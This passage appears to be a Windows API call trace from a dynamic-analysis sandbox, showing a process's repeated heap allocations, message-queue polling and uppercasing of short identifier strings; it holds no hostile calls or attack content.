[0215.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0215.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0215.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0215.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0215.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0215.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0215.172] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0215.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0215.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0215.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0215.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0215.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0215.172] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0215.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0215.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0215.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0215.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0215.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0215.173] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0215.173] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0215.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0215.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0215.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0215.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0215.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0215.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0215.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0215.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0215.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0215.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.173] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0215.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0215.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0215.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0215.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0215.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.174] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0215.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0215.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0215.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0215.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0215.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0215.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0215.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.175] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0215.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0215.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0215.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0215.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0215.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0215.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0215.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0215.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0215.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0215.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0215.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.175] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0215.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0215.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0215.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0215.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0215.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0215.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0215.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0215.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0215.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0215.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0215.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0215.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0215.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.176] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0215.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0215.176] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0215.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0215.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab578 [0215.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0215.176] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0215.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0215.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0215.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0215.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0215.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0215.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0215.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0215.177] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0215.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0215.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0215.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0215.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0215.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0215.177] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0215.177] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0215.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0215.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0215.177] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0215.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab7b8 [0215.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a741f0 [0215.177] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0215.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0215.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0215.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0215.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0215.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0215.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0215.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0215.178] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0215.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0215.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0215.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0215.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0215.178] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0215.178] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0215.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0215.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0215.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0215.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0215.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0215.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0215.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0215.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741f0 | out: hHeap=0x2af0000) returned 1 [0215.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0215.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0215.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0215.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0215.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0215.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0215.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0215.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0215.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0215.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0215.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0215.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0215.184] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0215.184] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0215.184] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0215.184] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0215.184] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0215.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab848 [0215.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74550 [0215.185] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0215.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0215.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0215.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0215.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0215.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0215.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0215.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0215.185] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0215.185] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.185] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0215.185] HeapFree (in: hHeap=0x2af0000, 